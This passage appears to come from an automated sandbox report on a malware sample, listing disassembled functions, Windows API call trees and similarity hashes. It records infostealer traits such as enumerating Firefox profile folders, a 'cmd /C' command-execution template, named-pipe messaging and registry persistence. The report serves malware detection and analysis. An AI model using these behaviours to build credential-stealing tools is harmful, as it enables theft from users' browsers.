    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8CA3, Relevance: 9.1, APIs: 6, Instructions: 72 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6C08, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 141 Total matches: 19registrysynchronization
Similarity
  • Total matches: 19
  • API ID: RegCloseKeyRegOpenKeySetEventWaitForSingleObject
  • String ID: %APPDATA%\Mozilla\Firefox\Profiles
  • API String ID: 2346524515-3215297822
  • Opcode ID: 04e48ca811839595ab19984103b0a713a9098f9930145295782b9b8a8acae543
  • Instruction ID: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
  • Opcode Fuzzy Hash: 64110C72556761C8C9256C84281E37A35C3FA833D3D2C7703EDA071A8B4B8261ECBD98
  • Instruction Fuzzy Hash: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
APIs
    • Part of subcall function 001D83A0: GetProcAddress.KERNEL32(001ED992,001C6C3C,00000000), ref: 001D83B4
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
    • Part of subcall function 001C3996: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001C3996: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
    • Part of subcall function 001C3996: GetLastError.KERNEL32 ref: 001C3A9B
    • Part of subcall function 001C3996: HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
    • Part of subcall function 001C3996: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
  • SetEvent.KERNEL32(00000001,001EB1D0,?,00000000), ref: 001C6C91
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C6D1E
  • RegOpenKeyA.ADVAPI32(80000001,001EC992,?), ref: 001C6D4F
  • RegCloseKey.ADVAPI32(?), ref: 001C6D77
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
    • Part of subcall function 001D9029: NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 001D905A
    • Part of subcall function 001D9029: RtlNtStatusToDosError.NTDLL(C000009A), ref: 001D9095
    • Part of subcall function 001D6D18: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
    • Part of subcall function 001D6D18: GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001D6D18: ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
    • Part of subcall function 001D6D18: GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
    • Part of subcall function 001D6D18: CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
Strings
  • %APPDATA%\Mozilla\Firefox\Profiles, xrefs: 001C6CA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C838C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102 Total matches: 54memory
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3F95, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80 Total matches: 37memorystring
Similarity
  • Total matches: 37
  • API ID: HeapFree$RtlAllocateHeaplstrcmpi
  • String ID: Main
  • API String ID: 2523190637-521822810
  • Opcode ID: f2d70ba1db336b0a4ac6973dd472b45d7992a95be766767dbdcbf8c120d66562
  • Instruction ID: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
  • Opcode Fuzzy Hash: 8DF095610946C3D35417545580B03B89004AFD22F2C4D43FAE9303D1CB7E1235D7765F
  • Instruction Fuzzy Hash: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
APIs
    • Part of subcall function 001DDAD4: memcpy.NTDLL(00000000,00000084,00000084,001CD4DC,00000000,00000000,001DDB4C,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001), ref: 001DDAF2
    • Part of subcall function 001DDAD4: memset.NTDLL ref: 001DDB24
  • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
  • lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C5816: lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
    • Part of subcall function 001C5816: HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
    • Part of subcall function 001C5816: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
    • Part of subcall function 001C5816: lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
    • Part of subcall function 001C5816: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
    • Part of subcall function 001C5816: Sleep.KERNEL32(0000000A), ref: 001C58F2
    • Part of subcall function 001C5816: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C3F4D: RegCloseKey.ADVAPI32(?,?,?,001C403B,00000000,?,?,00000000,00000000,-00000008), ref: 001C3F87
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4202, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63 Total matches: 53memoryregistry
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C29BF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41 Total matches: 45memorystring
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9EAA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33 Total matches: 56memorystring
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAF14, Relevance: 7.7, APIs: 5, Instructions: 174 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8B4E, Relevance: 7.6, APIs: 5, Instructions: 125 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C45F0, Relevance: 7.6, APIs: 5, Instructions: 121 Total matches: 58memoryregistrysynchronization
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7878, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C439B, Relevance: 7.6, APIs: 5, Instructions: 98 Total matches: 56timememory
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9F0B, Relevance: 7.6, APIs: 5, Instructions: 95 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C44E2, Relevance: 7.6, APIs: 5, Instructions: 90 Total matches: 117synchronization
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
